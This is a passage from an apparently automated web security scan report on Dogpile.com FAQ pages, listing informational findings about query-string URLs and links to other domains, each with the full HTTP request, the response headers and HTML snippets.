<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.41. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=fa22bd6d9a064615a3bfc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:21 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:21 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:21 GMT
Connection: close
Content-Length: 64278
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="Faq, frequently asked questions, meta search, metasearch, Infospace, dogpile, dogpile.com" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.42. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=8f4412d823544e4d9eb2c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:32 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:32 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:32 GMT
Connection: close
Content-Length: 64282
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="Faq, frequently asked questions, meta search, metasearch, Infospace, dogpile, dogpile.com" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.43. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=767be02a2f884d2ab4f3c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:16 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:16 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:16 GMT
Connection: close
Content-Length: 64589
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="Faq, frequently asked questions, meta search, metasearch, Infospace, dogpile, dogpile.com" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.44. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=9727be92aec04ad2b859c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:12 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:12 GMT
Connection: close
Content-Length: 64587
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="Faq, frequently asked questions, meta search, metasearch, Infospace, dogpile, dogpile.com" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
